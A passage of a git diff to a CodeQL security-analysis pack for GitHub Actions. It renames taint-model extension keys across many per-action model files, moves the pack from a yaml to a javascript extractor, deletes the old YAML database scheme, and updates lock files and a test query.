8b2b4e79afa5..a4ccaac2d2e0 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2ea1fdf68556..7c32705dde54 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 21e0d819db74..902483f43997 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index bcc8ce6b80db..be86a330b97e 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 741ab37eb9b6..0a6f7c347226 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index a9d6b80a627f..613b3e0fc59f 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 73d4df99af28..489d47ac71e9 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index fb6ae5102e1b..4a98ecd4af16 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 8b29e5c99881..57dc40ef6b8b 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 5a5cedcaca5f..3b92f667ae90 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index d156d7da6581..da8b02312ea0 100644 --- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index 12d3f23f8fdf..c06d13301d27 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 30be564c42a4..61935c36f7d6 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 13d4cfeb814d..89f61cedc422 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 3043c9b30ec2..1aabfc23fc4b 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index 29d51d1bfbba..d55fdbc3ea98 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index 75a9650a92fb..d01ac86d3178 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index a85a4b466e25..bab76cbe27ff 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index a0c4d6f7ec50..02ac5032c797 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index b5d4629003b7..0c484d44549b 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index 4b96edeccc2f..c088c7a644eb 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index ae3ef2e2b1b7..5b22ac1f5fe8 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 079dfc1fc02b..3329a255e6f8 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 19edd617c670..14a1cdeed86a 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 8ab1d090b1cc..49931d93f885 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 9f8d987c0aff..37d0014bcbb4 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 90a181038680..9058c9fb984c 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index fd484074f5c5..713c5c61cea7 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 5caaea9562e1..40b02283152a 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 9462b8d5bbd1..c08505f97477 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 9b01987e1f28..6305fd339604 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 10a3630ea0bd..739880968188 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index aac20afddf56..ee9a0dbb32a6 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 8dcabd1650a6..f056cf5d8644 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index d98eda4e69f8..838f0b308487 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index b8fb2514253c..c215755f61dd 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index ae166b1f5154..014e779b29a0 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index a6cc68843895..806c055529df 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 499161aafcb3..d6e554a87092 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index a352d6c9ff61..55d1531a7707 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index 6ed71f182151..c52d62e204a4 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 5864c0d0ede0..1e915194d96e 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 173ecfc4222f..1cc360c472d2 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 880b0d606da2..cb7e0936cca1 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index fd8172c6ca84..210c3365eda9 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c126..000000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9acfb3035a41..f898f18a295f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,14 +4,13 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.32 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 -dbscheme: yaml.dbscheme -extractor: yaml -groups: - - yaml + codeql/javascript-all: '*' + codeql/util: '*' + codeql/yaml: '*' + codeql/controlflow: '*' + codeql/dataflow: '*' +extractor: javascript +groups: javascript dataExtensions: - ext/*.model.yml - ext/**/*.model.yml diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme deleted file mode 100644 index 20d83c71ee67..000000000000 --- a/ql/lib/yaml.dbscheme +++ /dev/null @@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats deleted file mode 100644 index 1c35ae984020..000000000000 --- a/ql/lib/yaml.dbscheme.stats +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 84a6ccba26dc..ce7000fc1b9d 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,8 +5,14 @@ dependencies: version: 0.1.8 codeql/dataflow: version: 0.1.8 + codeql/javascript-all: + version: 0.5.2 + codeql/regex: + version: 0.0.10 codeql/ssa: version: 0.2.8 + codeql/tutorial: + version: 0.0.7 codeql/typetracking: version: 0.2.8 codeql/util: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5637bef68a03..4192be6a4caf 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -2,12 +2,11 @@ library: false name: githubsecuritylab/actions-queries version: 0.0.32 -groups: - - actions - - queries +groups: [actions, queries] suites: codeql-suites -extractor: yaml +extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: + codeql/javascript-all: '*' githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26dc..ce7000fc1b9d 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,8 +5,14 @@ dependencies: version: 0.1.8 codeql/dataflow: version: 0.1.8 + codeql/javascript-all: + version: 0.5.2 + codeql/regex: + version: 0.0.10 codeql/ssa: version: 0.2.8 + codeql/tutorial: + version: 0.0.7 codeql/typetracking: version: 0.2.8 codeql/util: diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index e3304b4fe72b..80ebd80b4c2b 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -50,13 +50,13 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } query predicate sources(string action, string version, string output, string kind, string provenance) { - sourceModel(action, version, output, kind, provenance) + actionsSourceModel(action, version, output, kind, provenance) } query predicate summaries( string action, string version, string input, string output, string kind, string provenance ) { - summaryModel(action, version, input, output, kind, provenance) + actionsSummaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index 